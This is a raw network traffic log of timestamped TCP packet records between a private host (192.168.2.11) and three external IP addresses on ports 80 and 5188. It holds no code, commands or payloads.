Dec 5, 2024 17:32:15.983386040 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.983419895 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.983433008 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.983633041 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.983644962 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.983655930 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.983675957 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.983684063 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.983688116 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.983700991 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.983711958 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.983712912 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.983725071 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.983728886 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.983736038 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.983748913 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.983761072 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.983761072 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.983774900 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.983777046 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.983786106 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.983793974 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.983799934 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.983810902 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.983823061 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.983825922 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.983855963 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.983865976 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.984380960 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.984441996 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.984452963 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.984463930 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.984483004 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.984483957 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.984496117 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.984500885 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.984519958 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.984530926 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.984533072 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.984555960 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.984580994 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.984637022 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.984648943 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.984659910 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.984673977 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.984685898 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.984688044 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.984698057 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.984709978 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.984713078 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.984735966 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.984745979 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.985483885 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.985490084 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.985502005 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.985521078 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.985531092 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.985532999 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.985549927 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.985555887 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.985563993 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.985579014 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.985584974 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.985594034 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.985596895 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.985605955 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.985610008 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.985620022 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.985631943 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.985656023 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.985938072 CET	80	49800	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:15.985949993 CET	80	49800	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:15.985969067 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.985985994 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.985995054 CET	49800	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:15.985999107 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.986010075 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.986022949 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.986042976 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.986042976 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.986082077 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.986098051 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.986109972 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.986120939 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.986128092 CET	80	49800	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:15.986133099 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.986140013 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.986145020 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.986151934 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.986157894 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.986258030 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.986946106 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.986963987 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.986973047 CET	49800	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:15.986977100 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.986989021 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.987010002 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.987046957 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.987145901 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.987158060 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.987169981 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.987180948 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.987193108 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.987205029 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.987207890 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.987217903 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.987219095 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.987231970 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.987238884 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.987243891 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.987257004 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.987267971 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.987277031 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.987298012 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.988157034 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.988168955 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.988179922 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.988193035 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.988204956 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.988217115 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.988220930 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.988234043 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.988245010 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.988251925 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.988256931 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.988270044 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.988281965 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.988292933 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.988292933 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.988296032 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.988308907 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.988321066 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.988322020 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.988338947 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.988346100 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.988387108 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.988827944 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.988840103 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.988850117 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.988863945 CET	80	49800	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:15.988873959 CET	80	49800	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:15.988883018 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.988899946 CET	49800	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:15.988923073 CET	49800	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:15.988945961 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.988987923 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.989160061 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.989171028 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.989182949 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.989195108 CET	80	49800	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:15.989207983 CET	80	49800	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:15.989216089 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.989221096 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.989224911 CET	49800	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:15.989238024 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.989238024 CET	49800	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:15.989253044 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.989264011 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.989264011 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.989278078 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.989289045 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.989301920 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.989312887 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.989320993 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.989320993 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.989327908 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.989356041 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.989356041 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.990132093 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.990144014 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.990154982 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.990166903 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.990179062 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.990183115 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.990190983 CET	80	49800	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:15.990201950 CET	80	49800	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:15.990214109 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.990214109 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.990219116 CET	49800	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:15.990226030 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.990231991 CET	49800	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:15.990240097 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.990252018 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.990256071 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.990284920 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.990298033 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.990298986 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.990317106 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.990328074 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.990340948 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.990340948 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.990385056 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.990385056 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.990886927 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.990899086 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.990936041 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.990947962 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.990956068 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.990961075 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.990981102 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.991067886 CET	80	49800	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:15.991080046 CET	80	49800	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:15.991091967 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.991105080 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.991116047 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.991117001 CET	49800	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:15.991127968 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.991143942 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.991164923 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.991187096 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.991198063 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.991226912 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.991226912 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.991239071 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.991261005 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.991832972 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.991846085 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.991858959 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.991890907 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.991913080 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.992074966 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.992086887 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.992099047 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.992111921 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.992121935 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.992124081 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.992161989 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.992192984 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.992206097 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.992218018 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.992229939 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.992244005 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.992254972 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.992260933 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.992261887 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.992269039 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.992283106 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.992289066 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.992300034 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.992312908 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.992335081 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.992335081 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.993009090 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.993021965 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.993030071 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.993062973 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.993072987 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.993088961 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.993113995 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.993164062 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.993175983 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.993187904 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.993201017 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.993201971 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.993211985 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.993216991 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.993223906 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.993237019 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.993247986 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.993253946 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.993264914 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.993272066 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.993278027 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.993284941 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.993314981 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.994005919 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.994019032 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.994029045 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.994041920 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.994044065 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.994054079 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.994066000 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.994076967 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.994096994 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.994122982 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.994134903 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.994146109 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.994157076 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.994158030 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.994170904 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.994183064 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.994189024 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.994195938 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.994208097 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.994210005 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.994220972 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.994226933 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.994255066 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.994838953 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.994858027 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.994880915 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.994899988 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.994966030 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.995001078 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.995055914 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.995080948 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.995090008 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.995091915 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.995102882 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.995114088 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.995115995 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.995140076 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.995157003 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.995182991 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.995193958 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.995204926 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.995218039 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.995218039 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.995229959 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.995237112 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.995242119 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.995254040 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.995263100 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.995265961 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.995275021 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.995306015 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.996186972 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.996201038 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.996212959 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.996225119 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.996233940 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.996237040 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.996248960 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.996256113 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.996263027 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.996273994 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.996274948 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.996285915 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.996298075 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.996303082 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.996309996 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.996323109 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.996334076 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.996335983 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.996344090 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.996345997 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.996356964 CET	80	49793	185.215.113.84	192.168.2.11
